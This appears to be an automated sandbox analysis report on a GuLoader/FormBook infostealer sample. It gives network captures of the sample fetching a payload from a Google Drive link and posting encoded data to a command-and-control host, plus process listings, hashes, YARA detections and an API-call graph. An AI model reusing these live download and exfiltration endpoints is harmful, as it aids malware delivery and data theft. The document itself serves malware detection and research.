                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.11.30 | 49855 | 91.195.240.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:10:48.765856981 CET | 718 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.popup-shops.us
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.popup-shops.us
                                                                                    Referer: http://www.popup-shops.us/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=TkZvAvBd3hCcmSn19sos1f+VBOs+nOZUGp54rvKXDuUrEdDL7/qAn1lFytHEFJV4xiwt83AAWyqEv8OC/KKKjlxP9oo+J07q1TpRccMvpDcVkH0d8t0nZmMd5c8FR3YXjiyomcQOdBjwj1A+W8WuewPthYlXk1Ie9tepgLIaLBhH/KdIedW6unxGiQgZeNn+PP3Stkc=
Dec 4, 2023 12:10:48.948324919 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:10:48 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
96 | 192.168.11.30 | 49856 | 91.195.240.19 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:10:53.280410051 CET | 1635 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.popup-shops.us
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.popup-shops.us
                                                                                    Referer: http://www.popup-shops.us/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Dec 4, 2023 12:10:53.463102102 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:10:53 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.30 | 49744 | 142.250.65.174 | 443 | 1380 | C:\Users\user\Desktop\hesaphareketi-01.exe
Timestamp | Bytes transferred | Direction | Data
2023-12-04 11:03:14 UTC | 216 | OUT | GET /uc?export=download&id=1ZIshcel7UMzwz8rXT4KX5lfic62QjZtZ HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
2023-12-04 11:03:15 UTC | 1732 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 04 Dec 2023 11:03:15 GMT
Location: https://doc-0g-ag-docs.google


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.30 | 49748 | 142.251.40.129 | 443 | 1380 | C:\Users\user\Desktop\hesaphareketi-01.exe
Timestamp | Bytes transferred | Direction | Data
2023-12-04 11:03:16 UTC | 408 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/afsc4ag5uqa5maj4frjtgk9skbeu3peo/1701687750000/14166578405435855174/*/1ZIshcel7UMzwz8rXT4KX5lfic62QjZtZ?e=download&uuid=e13d7ba5-3bd0-48f6-b701-0767cd5a3c67 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                    Cache-Control: no-cache
                                                                                    Host: doc-0g-ag-docs.googleusercontent.com
                                                                                    Connection: Keep-Alive
2023-12-04 11:03:16 UTC | 4430 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: ABPtcPpIFhaDjwYIcwNbizkfNJ0DMW54w7OQ0ahT_5cdQ8QV8u0Y1XqGWVcczDr6WsTduMQQ-VybHNB8ayM-xFitU4cAyAu4PhNb
X-Content-Type-Options: nosniff
Content-Type: application/octet-stream
Content-Disposition: attachment; filename



                                                                                    Target ID:0
                                                                                    Start time:12:02:17
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:368'795 bytes
                                                                                    MD5 hash:E96BD1C59A8E67C4AB01A9327C98AAB7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1273244307.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1275057239.0000000008E1E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:12:03:02
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:368'795 bytes
                                                                                    MD5 hash:E96BD1C59A8E67C4AB01A9327C98AAB7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:12:03:16
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe"
                                                                                    Imagebase:0xca0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:19
                                                                                    Start time:12:03:18
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                    Imagebase:0x80000
                                                                                    File size:340'992 bytes
                                                                                    MD5 hash:7C22FED393CA0330A10B47848018C225
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:20
                                                                                    Start time:12:03:41
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                    Imagebase:0x7ff73bdd0000
                                                                                    File size:687'008 bytes
                                                                                    MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true


                                                                                      Execution Graph

                                                                                      Execution Coverage:25%
                                                                                      Dynamic/Decrypted Code Coverage:14.1%
                                                                                      Signature Coverage:14.9%
                                                                                      Total number of Nodes:1491
                                                                                      Total number of Limit Nodes:45
5105 10001726 5103->5105 5106 10001709 5103->5106 5107 100016fd 5104->5107 5109 10001750 5105->5109 5110 1000172c 5105->5110 5108 1000153d 3 API calls 5106->5108 5112 1000170e 5108->5112 5111 1000153d 3 API calls 5109->5111 5113 100015b4 3 API calls 5110->5113 5111->5107 5114 100015b4 3 API calls 5112->5114 5115 10001731 5113->5115 5116 10001714 5114->5116 5117 10001272 2 API calls 5115->5117 5119 10001272 2 API calls 5116->5119 5118 10001737 GlobalFree 5117->5118 5118->5107 5120 1000174b GlobalFree 5118->5120 5121 1000171a GlobalFree 5119->5121 5120->5107 5121->5107 5122 401e77 5123 402c37 17 API calls 5122->5123 5124 401e7d 5123->5124 5125 402c37 17 API calls 5124->5125 5126 401e86 5125->5126 5127 402c37 17 API calls 5126->5127 5128 401e8f 5127->5128 5129 402c37 17 API calls 5128->5129 5130 401e98 5129->5130 5131 401423 24 API calls 5130->5131 5132 401e9f 5131->5132 5139 4058aa ShellExecuteExW 5132->5139 5134 401ee1 5135 40670d 5 API calls 5134->5135 5137 402885 5134->5137 5136 401efb CloseHandle 5135->5136 5136->5137 5139->5134 5140 10002238 5141 10002296 5140->5141 5143 100022cc 5140->5143 5142 100022a8 GlobalAlloc 5141->5142 5141->5143 5142->5141 4722 40167b 4723 402c37 17 API calls 4722->4723 4724 401682 4723->4724 4725 402c37 17 API calls 4724->4725 4726 40168b 4725->4726 4727 402c37 17 API calls 4726->4727 4728 401694 MoveFileW 4727->4728 4729 4016a0 4728->4729 4730 4016a7 4728->4730 4732 401423 24 API calls 4729->4732 4731 4065c5 2 API calls 4730->4731 4734 40224a 4730->4734 4733 4016b6 4731->4733 4732->4734 4733->4734 4735 406048 36 API calls 4733->4735 4735->4729 5144 401bfc 5145 4062a4 17 API calls 5144->5145 5146 401c07 5145->5146 5147 1000103d 5148 1000101b 5 API calls 5147->5148 5149 10001056 5148->5149 5150 401b7d 5154 401b7e 5150->5154 5151 4022de 5152 4062a4 17 API calls 5151->5152 5153 4022eb 5152->5153 5156 4058e4 MessageBoxIndirectW 5153->5156 5154->5151 5163 406282 lstrcpynW 5154->5163 5162 4022f1 5156->5162 5157 401ba4 5164 406282 lstrcpynW 
5157->5164 5159 401bb3 5159->5151 5160 4029db 5159->5160 5165 406282 lstrcpynW 5160->5165 5163->5157 5164->5159 5165->5162 4736 40247e 4737 402c77 17 API calls 4736->4737 4738 402488 4737->4738 4739 402c37 17 API calls 4738->4739 4740 402491 4739->4740 4741 402885 4740->4741 4742 40249c RegQueryValueExW 4740->4742 4743 4024bc 4742->4743 4746 4024c2 RegCloseKey 4742->4746 4743->4746 4747 4061c9 wsprintfW 4743->4747 4746->4741 4747->4746 4822 4020fe 4823 402c37 17 API calls 4822->4823 4824 402105 4823->4824 4825 402c37 17 API calls 4824->4825 4826 40210f 4825->4826 4827 402c37 17 API calls 4826->4827 4828 402119 4827->4828 4829 402c37 17 API calls 4828->4829 4830 402123 4829->4830 4831 402c37 17 API calls 4830->4831 4832 40212d 4831->4832 4833 40216c CoCreateInstance 4832->4833 4834 402c37 17 API calls 4832->4834 4837 40218b 4833->4837 4834->4833 4835 401423 24 API calls 4836 40224a 4835->4836 4837->4835 4837->4836 5166 4019ff 5167 402c37 17 API calls 5166->5167 5168 401a06 5167->5168 5169 402c37 17 API calls 5168->5169 5170 401a0f 5169->5170 5171 401a16 lstrcmpiW 5170->5171 5172 401a28 lstrcmpW 5170->5172 5173 401a1c 5171->5173 5172->5173 3722 401f00 3737 402c37 3722->3737 3729 401f39 CloseHandle 3733 402885 3729->3733 3732 401f2b 3734 401f30 3732->3734 3735 401f3b 3732->3735 3762 4061c9 wsprintfW 3734->3762 3735->3729 3738 402c43 3737->3738 3763 4062a4 3738->3763 3741 401f06 3743 4052e6 3741->3743 3744 405301 3743->3744 3752 401f10 3743->3752 3745 40531d lstrlenW 3744->3745 3746 4062a4 17 API calls 3744->3746 3747 405346 3745->3747 3748 40532b lstrlenW 3745->3748 3746->3745 3749 405359 3747->3749 3750 40534c SetWindowTextW 3747->3750 3751 40533d lstrcatW 3748->3751 3748->3752 3749->3752 3753 40535f SendMessageW SendMessageW SendMessageW 3749->3753 3750->3749 3751->3747 3754 405867 CreateProcessW 3752->3754 3753->3752 3755 401f16 3754->3755 3756 40589a CloseHandle 3754->3756 3755->3729 3755->3733 3757 40670d WaitForSingleObject 3755->3757 3756->3755 3758 406727 
3757->3758 3759 406739 GetExitCodeProcess 3758->3759 3805 406698 3758->3805 3759->3732 3762->3729 3778 4062b1 3763->3778 3764 4064fc 3765 402c64 3764->3765 3796 406282 lstrcpynW 3764->3796 3765->3741 3780 406516 3765->3780 3767 4064ca lstrlenW 3767->3778 3770 4062a4 10 API calls 3770->3767 3772 4063df GetSystemDirectoryW 3772->3778 3773 4063f2 GetWindowsDirectoryW 3773->3778 3774 406516 5 API calls 3774->3778 3775 406426 SHGetSpecialFolderLocation 3775->3778 3779 40643e SHGetPathFromIDListW CoTaskMemFree 3775->3779 3776 4062a4 10 API calls 3776->3778 3777 40646d lstrcatW 3777->3778 3778->3764 3778->3767 3778->3770 3778->3772 3778->3773 3778->3774 3778->3775 3778->3776 3778->3777 3789 406150 3778->3789 3794 4061c9 wsprintfW 3778->3794 3795 406282 lstrcpynW 3778->3795 3779->3778 3786 406523 3780->3786 3781 406599 3782 40659e CharPrevW 3781->3782 3784 4065bf 3781->3784 3782->3781 3783 40658c CharNextW 3783->3781 3783->3786 3784->3741 3786->3781 3786->3783 3787 406578 CharNextW 3786->3787 3788 406587 CharNextW 3786->3788 3801 405b80 3786->3801 3787->3786 3788->3783 3797 4060ef 3789->3797 3792 4061b4 3792->3778 3793 406184 RegQueryValueExW RegCloseKey 3793->3792 3794->3778 3795->3778 3796->3765 3798 4060fe 3797->3798 3799 406102 3798->3799 3800 406107 RegOpenKeyExW 3798->3800 3799->3792 3799->3793 3800->3799 3802 405b86 3801->3802 3803 405b9c 3802->3803 3804 405b8d CharNextW 3802->3804 3803->3786 3804->3802 3806 4066b5 PeekMessageW 3805->3806 3807 4066c5 WaitForSingleObject 3806->3807 3808 4066ab DispatchMessageW 3806->3808 3807->3758 3808->3806 3983 100027c2 3984 10002812 3983->3984 3985 100027d2 VirtualProtect 3983->3985 3985->3984 5174 402003 5175 402012 5174->5175 5176 40200c 5174->5176 5177 402020 5175->5177 5202 4061c9 wsprintfW 5175->5202 5201 4061c9 wsprintfW 5176->5201 5180 4020f0 5177->5180 5181 402c37 17 API calls 5177->5181 5183 401423 24 API calls 5180->5183 5182 402045 5181->5182 5184 402c37 17 API calls 5182->5184 5188 40224a 5183->5188 5185 40204e 
5184->5185 5186 402064 LoadLibraryExW 5185->5186 5187 402056 GetModuleHandleW 5185->5187 5186->5180 5189 402075 5186->5189 5187->5186 5187->5189 5190 4066cb 2 API calls 5189->5190 5191 402080 5190->5191 5192 402086 5191->5192 5193 4020bf 5191->5193 5194 4020a5 5192->5194 5195 40208e 5192->5195 5196 4052e6 24 API calls 5193->5196 5200 10001759 50 API calls 5194->5200 5197 401423 24 API calls 5195->5197 5198 402096 5196->5198 5197->5198 5198->5188 5199 4020e2 FreeLibrary 5198->5199 5199->5188 5200->5198 5201->5175 5202->5177 5203 401503 5204 40150b 5203->5204 5206 40151e 5203->5206 5205 402c15 17 API calls 5204->5205 5205->5206 3997 402306 3998 402314 3997->3998 3999 40230e 3997->3999 4001 402322 3998->4001 4002 402c37 17 API calls 3998->4002 4000 402c37 17 API calls 3999->4000 4000->3998 4003 402330 4001->4003 4004 402c37 17 API calls 4001->4004 4002->4001 4005 402c37 17 API calls 4003->4005 4004->4003 4006 402339 WritePrivateProfileStringW 4005->4006 4014 402388 4015 402390 4014->4015 4016 4023bb 4014->4016 4026 402c77 4015->4026 4018 402c37 17 API calls 4016->4018 4020 4023c2 4018->4020 4031 402cf5 4020->4031 4021 4023a1 4023 402c37 17 API calls 4021->4023 4025 4023a8 RegDeleteValueW RegCloseKey 4023->4025 4024 4023cf 4025->4024 4027 402c37 17 API calls 4026->4027 4028 402c8e 4027->4028 4029 4060ef RegOpenKeyExW 4028->4029 4030 402397 4029->4030 4030->4021 4030->4024 4032 402d0b 4031->4032 4033 402d21 4032->4033 4035 402d2a 4032->4035 4033->4024 4036 4060ef RegOpenKeyExW 4035->4036 4037 402d58 4036->4037 4038 402dd0 4037->4038 4043 402d5c 4037->4043 4038->4033 4039 402d7e RegEnumKeyW 4040 402d95 RegCloseKey 4039->4040 4039->4043 4041 40665c 5 API calls 4040->4041 4045 402da5 4041->4045 4042 402db6 RegCloseKey 4042->4038 4043->4039 4043->4040 4043->4042 4044 402d2a 6 API calls 4043->4044 4044->4043 4046 402dc4 RegDeleteKeyW 4045->4046 4047 402da9 4045->4047 4046->4038 4047->4038 5207 40100b DefWindowProcW 5208 401179 5207->5208 5209 40190c 5210 401943 5209->5210 
5211 402c37 17 API calls 5210->5211 5212 401948 5211->5212 5213 405990 67 API calls 5212->5213 5214 401951 5213->5214 5215 401d0e 5216 402c15 17 API calls 5215->5216 5217 401d15 5216->5217 5218 402c15 17 API calls 5217->5218 5219 401d21 GetDlgItem 5218->5219 5220 40258c 5219->5220 5221 1000164f 5222 10001516 GlobalFree 5221->5222 5223 10001667 5222->5223 5224 100016ad GlobalFree 5223->5224 5225 10001682 5223->5225 5226 10001699 VirtualFree 5223->5226 5225->5224 5226->5224 5227 40190f 5228 402c37 17 API calls 5227->5228 5229 401916 5228->5229 5230 4058e4 MessageBoxIndirectW 5229->5230 5231 40191f 5230->5231 5232 401491 5233 4052e6 24 API calls 5232->5233 5234 401498 5233->5234 5235 402592 5236 4025c1 5235->5236 5237 4025a6 5235->5237 5239 4025f5 5236->5239 5240 4025c6 5236->5240 5238 402c15 17 API calls 5237->5238 5247 4025ad 5238->5247 5242 402c37 17 API calls 5239->5242 5241 402c37 17 API calls 5240->5241 5243 4025cd WideCharToMultiByte lstrlenA 5241->5243 5244 4025fc lstrlenW 5242->5244 5243->5247 5244->5247 5245 402629 5246 40263f 5245->5246 5248 405e26 WriteFile 5245->5248 5247->5245 5247->5246 5249 405e55 5 API calls 5247->5249 5248->5246 5249->5245 5250 404814 CoTaskMemFree 5251 405b53 3 API calls 5250->5251 5252 404827 5251->5252 5253 40485e SetDlgItemTextW 5252->5253 5255 4062a4 17 API calls 5252->5255 5254 404879 5253->5254 5287 404a21 5254->5287 5289 4058c8 GetDlgItemTextW 5254->5289 5256 404846 lstrcmpiW 5255->5256 5256->5253 5258 404857 lstrcatW 5256->5258 5258->5253 5259 4048a2 5262 405c5b 18 API calls 5259->5262 5260 40427e 8 API calls 5261 404a35 5260->5261 5263 4048a8 5262->5263 5290 406282 lstrcpynW 5263->5290 5265 4048bf 5266 40665c 5 API calls 5265->5266 5270 4048c6 5266->5270 5267 404907 5291 406282 lstrcpynW 5267->5291 5269 40490e 5271 405bfe 4 API calls 5269->5271 5270->5267 5275 405b9f 2 API calls 5270->5275 5276 40495f 5270->5276 5272 404914 GetDiskFreeSpaceW 5271->5272 5274 404938 MulDiv 5272->5274 5272->5276 5274->5276 5275->5270 5277 
404b6b 20 API calls 5276->5277 5286 4049d0 5276->5286 5280 4049bd 5277->5280 5278 40140b 2 API calls 5279 4049f3 5278->5279 5292 404239 KiUserCallbackDispatcher 5279->5292 5282 4049d2 SetDlgItemTextW 5280->5282 5283 4049c2 5280->5283 5282->5286 5285 404aa2 20 API calls 5283->5285 5284 404a0f 5284->5287 5288 40463f SendMessageW 5284->5288 5285->5286 5286->5278 5286->5279 5287->5260 5288->5287 5289->5259 5290->5265 5291->5269 5292->5284 5293 10001058 5295 10001074 5293->5295 5294 100010dd 5295->5294 5296 10001092 5295->5296 5297 10001516 GlobalFree 5295->5297 5298 10001516 GlobalFree 5296->5298 5297->5296 5299 100010a2 5298->5299 5300 100010b2 5299->5300 5301 100010a9 GlobalSize 5299->5301 5302 100010b6 GlobalAlloc 5300->5302 5303 100010c7 5300->5303 5301->5300 5304 1000153d 3 API calls 5302->5304 5305 100010d2 GlobalFree 5303->5305 5304->5303 5305->5294 4071 401c19 4072 402c15 17 API calls 4071->4072 4073 401c20 4072->4073 4074 402c15 17 API calls 4073->4074 4075 401c2d 4074->4075 4076 401c42 4075->4076 4078 402c37 17 API calls 4075->4078 4077 401c52 4076->4077 4079 402c37 17 API calls 4076->4079 4080 401ca9 4077->4080 4081 401c5d 4077->4081 4078->4076 4079->4077 4083 402c37 17 API calls 4080->4083 4082 402c15 17 API calls 4081->4082 4084 401c62 4082->4084 4085 401cae 4083->4085 4087 402c15 17 API calls 4084->4087 4086 402c37 17 API calls 4085->4086 4088 401cb7 FindWindowExW 4086->4088 4089 401c6e 4087->4089 4092 401cd9 4088->4092 4090 401c99 SendMessageW 4089->4090 4091 401c7b SendMessageTimeoutW 4089->4091 4090->4092 4091->4092 5306 402a9a SendMessageW 5307 402ab4 InvalidateRect 5306->5307 5308 402abf 5306->5308 5307->5308 5309 40281b 5310 402821 5309->5310 5311 402829 FindClose 5310->5311 5312 402abf 5310->5312 5311->5312 5313 40149e 5314 4022f1 5313->5314 5315 4014ac PostQuitMessage 5313->5315 5315->5314 5316 100010e1 5325 10001111 5316->5325 5317 100011d8 GlobalFree 5318 100012ba 2 API calls 5318->5325 5319 100011d3 5319->5317 5320 10001272 2 API calls 5323 
100011c4 GlobalFree 5320->5323 5321 10001164 GlobalAlloc 5321->5325 5322 100011f8 GlobalFree 5322->5325 5323->5325 5324 100012e1 lstrcpyW 5324->5325 5325->5317 5325->5318 5325->5319 5325->5320 5325->5321 5325->5322 5325->5323 5325->5324 5326 4015a3 5327 402c37 17 API calls 5326->5327 5328 4015aa SetFileAttributesW 5327->5328 5329 4015bc 5328->5329 5330 4046a4 5331 4046c1 SetDlgItemTextW 5330->5331 5332 4046ad 5330->5332 5333 4046d5 5331->5333 5332->5333 5334 404217 18 API calls 5332->5334 5335 40427e 8 API calls 5333->5335 5336 4046bc 5334->5336 5337 4046e1 5335->5337 5336->5331 4162 405425 4163 405446 GetDlgItem GetDlgItem GetDlgItem 4162->4163 4164 4055cf 4162->4164 4208 40424c SendMessageW 4163->4208 4166 405600 4164->4166 4167 4055d8 GetDlgItem CreateThread CloseHandle 4164->4167 4169 40562b 4166->4169 4170 405650 4166->4170 4171 405617 ShowWindow ShowWindow 4166->4171 4167->4166 4231 4053b9 OleInitialize 4167->4231 4168 4054b6 4174 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 4168->4174 4172 405637 4169->4172 4173 40568b 4169->4173 4217 40427e 4170->4217 4213 40424c SendMessageW 4171->4213 4176 405665 ShowWindow 4172->4176 4177 40563f 4172->4177 4173->4170 4181 405699 SendMessageW 4173->4181 4179 40552b 4174->4179 4180 40550f SendMessageW SendMessageW 4174->4180 4184 405685 4176->4184 4185 405677 4176->4185 4214 4041f0 4177->4214 4188 405530 SendMessageW 4179->4188 4189 40553e 4179->4189 4180->4179 4183 40565e 4181->4183 4190 4056b2 CreatePopupMenu 4181->4190 4187 4041f0 SendMessageW 4184->4187 4186 4052e6 24 API calls 4185->4186 4186->4184 4187->4173 4188->4189 4209 404217 4189->4209 4191 4062a4 17 API calls 4190->4191 4193 4056c2 AppendMenuW 4191->4193 4195 4056f2 TrackPopupMenu 4193->4195 4196 4056df GetWindowRect 4193->4196 4194 40554e 4197 405557 ShowWindow 4194->4197 4198 40558b GetDlgItem SendMessageW 4194->4198 4195->4183 4200 40570d 4195->4200 4196->4195 4201 40557a 4197->4201 4202 40556d ShowWindow 4197->4202 4198->4183 4199 4055b2 
SendMessageW SendMessageW 4198->4199 4199->4183 4203 405729 SendMessageW 4200->4203 4212 40424c SendMessageW 4201->4212 4202->4201 4203->4203 4204 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4203->4204 4206 40576b SendMessageW 4204->4206 4206->4206 4207 405794 GlobalUnlock SetClipboardData CloseClipboard 4206->4207 4207->4183 4208->4168 4210 4062a4 17 API calls 4209->4210 4211 404222 SetDlgItemTextW 4210->4211 4211->4194 4212->4198 4213->4169 4215 4041f7 4214->4215 4216 4041fd SendMessageW 4214->4216 4215->4216 4216->4170 4218 404296 GetWindowLongW 4217->4218 4228 40431f 4217->4228 4219 4042a7 4218->4219 4218->4228 4220 4042b6 GetSysColor 4219->4220 4221 4042b9 4219->4221 4220->4221 4222 4042c9 SetBkMode 4221->4222 4223 4042bf SetTextColor 4221->4223 4224 4042e1 GetSysColor 4222->4224 4225 4042e7 4222->4225 4223->4222 4224->4225 4226 4042f8 4225->4226 4227 4042ee SetBkColor 4225->4227 4226->4228 4229 404312 CreateBrushIndirect 4226->4229 4230 40430b DeleteObject 4226->4230 4227->4226 4228->4183 4229->4228 4230->4229 4238 404263 4231->4238 4233 404263 SendMessageW 4235 405415 OleUninitialize 4233->4235 4234 4053dc 4237 405403 4234->4237 4241 401389 4234->4241 4237->4233 4239 40427b 4238->4239 4240 40426c SendMessageW 4238->4240 4239->4234 4240->4239 4243 401390 4241->4243 4242 4013fe 4242->4234 4243->4242 4244 4013cb MulDiv SendMessageW 4243->4244 4244->4243 4245 4058aa ShellExecuteExW 4246 40202c 4247 40203e 4246->4247 4257 4020f0 4246->4257 4248 402c37 17 API calls 4247->4248 4249 402045 4248->4249 4251 402c37 17 API calls 4249->4251 4250 401423 24 API calls 4255 40224a 4250->4255 4252 40204e 4251->4252 4253 402064 LoadLibraryExW 4252->4253 4254 402056 GetModuleHandleW 4252->4254 4256 402075 4253->4256 4253->4257 4254->4253 4254->4256 4269 4066cb WideCharToMultiByte 4256->4269 4257->4250 4260 402086 4262 4020a5 4260->4262 4263 40208e 4260->4263 4261 4020bf 4264 4052e6 24 API calls 4261->4264 4272 10001759 4262->4272 4265 401423 24 API calls 
